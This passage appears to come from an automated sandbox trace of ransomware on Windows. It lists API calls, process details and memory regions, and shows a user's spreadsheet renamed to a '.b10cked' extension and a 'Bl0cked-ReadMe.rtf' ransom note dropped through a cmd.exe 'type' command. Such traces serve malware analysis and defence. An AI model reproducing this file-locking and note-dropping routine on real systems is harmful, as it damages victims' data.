_String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) 
returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.662] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0131.663] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0131.663] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0131.663] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0131.663] _wcsicmp (_String1="GJVVZA~1.XLS", _String2=".") returned 57 [0131.663] _wcsicmp (_String1="GJVVZA~1.XLS", _String2="..") returned 57 [0131.663] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvza~1.xls")) returned 0x20 [0131.663] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.663] SetErrorMode (uMode=0x0) returned 0x0 [0131.663] SetErrorMode (uMode=0x1) returned 0x0 [0131.663] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", nBufferLength=0x104, lpBuffer=0x12eabc, lpFilePart=0x12eaa4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", lpFilePart=0x12eaa4*="GJVVZA~1.XLS") returned 0x26 [0131.663] SetErrorMode (uMode=0x0) returned 0x1 [0131.663] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0131.664] _wcsicmp (_String1="GJVVZA~1.XLS", _String2=".") returned 57 [0131.664] _wcsicmp 
(_String1="GJVVZA~1.XLS", _String2="..") returned 57 [0131.664] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvza~1.xls")) returned 0x20 [0131.664] SetErrorMode (uMode=0x0) returned 0x0 [0131.664] SetErrorMode (uMode=0x1) returned 0x0 [0131.664] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", nBufferLength=0x104, lpBuffer=0x12ef38, lpFilePart=0x12ecd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", lpFilePart=0x12ecd0*="GJVVZA~1.XLS") returned 0x26 [0131.664] SetErrorMode (uMode=0x0) returned 0x1 [0131.664] SetErrorMode (uMode=0x0) returned 0x0 [0131.664] SetErrorMode (uMode=0x1) returned 0x0 [0131.664] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x12f140, lpFilePart=0x12ecd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked", lpFilePart=0x12ecd0*="gjVvzAf3d4AVCevrZIj.xlsx.b10cked") returned 0x3a [0131.664] SetErrorMode (uMode=0x0) returned 0x1 [0131.664] SetLastError (dwErrCode=0x0) [0131.664] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvzaf3d4avcevrzij.xlsx.b10cked")) returned 0xffffffff [0131.664] GetLastError () returned 0x2 [0131.664] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x12e64c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e64c) returned 0x260e70 [0131.664] FindNextFileW (in: hFindFile=0x260e70, lpFindFileData=0x12e64c | out: lpFindFileData=0x12e64c) returned 0 [0131.665] GetLastError () returned 0x12 [0131.665] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0131.666] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x271be0, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271be0) returned 0x260e70 [0131.666] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x12e8e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked", lpFilePart=0x0) returned 0x3a [0131.666] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx", nBufferLength=0x104, lpBuffer=0x12e8e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx", lpFilePart=0x0) returned 0x32 [0131.666] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvzaf3d4avcevrzij.xlsx")) returned 0x20 [0131.666] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvzaf3d4avcevrzij.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\gjvvzaf3d4avcevrzij.xlsx.b10cked"), dwFlags=0x3) returned 1 [0131.667] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0131.667] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12e898 | out: _Buffer=" 1") returned 9 [0131.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.667] GetFileType (hFile=0x7) returned 0x2 [0131.683] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0131.683] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12e824 | out: lpMode=0x12e824) returned 1 [0131.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.684] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12e858 | out: lpConsoleScreenBufferInfo=0x12e858) returned 1 [0131.684] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, 
nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0131.684] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12e898 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0131.684] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12e87c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12e87c*=0x1a) returned 1 [0131.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.684] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.685] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.685] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.685] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.685] SetConsoleInputExeNameW () returned 0x1 [0131.685] GetConsoleOutputCP () returned 0x1b5 [0131.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.685] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.685] exit (_Code=0) Process: id = "107" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0x994" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This 
Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11923 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11924 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11925 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11926 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 11927 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11928 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11929 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11930 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11931 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 11932 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12195 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000010000" filename = "" Region: id = 12196 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12197 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12198 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 12199 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 12200 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12201 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12202 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12203 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12204 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12205 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" 
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12206 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12207 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12208 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12209 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12210 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12211 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12212 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12213 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12214 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 12215 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 12216 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 12217 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 12218 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 163 os_tid = 0x998 [0131.848] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfa64 | out: lpSystemTimeAsFileTime=0x1cfa64*(dwLowDateTime=0x88861bc0, dwHighDateTime=0x1d440a9)) [0131.848] GetCurrentProcessId () returned 0x994 [0131.848] GetCurrentThreadId () returned 0x998 [0131.848] GetTickCount () returned 0x29ff6 [0131.848] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfa5c | out: lpPerformanceCount=0x1cfa5c*=18863724498) returned 1 [0131.849] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.849] __set_app_type (_Type=0x1) [0131.849] __p__fmode () returned 0x76b331f4 [0131.849] __p__commode () returned 0x76b331fc [0131.849] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.849] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.849] GetCurrentThreadId () returned 0x998 [0131.849] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x998) returned 0x38 [0131.849] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.849] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.849] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.849] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.849] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, 
phkResult=0x1cf9f4 | out: phkResult=0x1cf9f4*=0x0) returned 0x2 [0131.850] VirtualQuery (in: lpAddress=0x1cfa2b, lpBuffer=0x1cf9c4, dwLength=0x1c | out: lpBuffer=0x1cf9c4*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.850] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf9c4, dwLength=0x1c | out: lpBuffer=0x1cf9c4*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.850] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf9c4, dwLength=0x1c | out: lpBuffer=0x1cf9c4*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.850] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf9c4, dwLength=0x1c | out: lpBuffer=0x1cf9c4*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.850] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf9c4, dwLength=0x1c | out: lpBuffer=0x1cf9c4*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.850] GetConsoleOutputCP () returned 0x1b5 [0131.850] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.850] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.850] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.850] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.850] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.850] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0131.850] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.851] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.851] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.851] GetEnvironmentStringsW () returned 0x350168* [0131.851] FreeEnvironmentStringsW (penv=0x350168) returned 1 [0131.851] GetEnvironmentStringsW () returned 0x350168* [0131.851] FreeEnvironmentStringsW (penv=0x350168) returned 1 [0131.851] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce964 | out: phkResult=0x1ce964*=0x40) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x90, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x1, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x1, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x0, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x40, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, 
lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x40, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x40, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.851] RegCloseKey (hKey=0x40) returned 0x0 [0131.851] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce964 | out: phkResult=0x1ce964*=0x40) returned 0x0 [0131.851] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x40, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x1, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x1, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x0, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x9, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: 
lpType=0x1ce96c*=0x4, lpData=0x1ce970*=0x9, lpcbData=0x1ce968*=0x4) returned 0x0 [0131.852] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce96c, lpData=0x1ce970, lpcbData=0x1ce968*=0x1000 | out: lpType=0x1ce96c*=0x0, lpData=0x1ce970*=0x9, lpcbData=0x1ce968*=0x1000) returned 0x2 [0131.852] RegCloseKey (hKey=0x40) returned 0x0 [0131.852] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.852] srand (_Seed=0x5b886366) [0131.852] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0131.852] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0131.852] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.852] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3518c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.853] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.853] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.853] GetEnvironmentVariableW 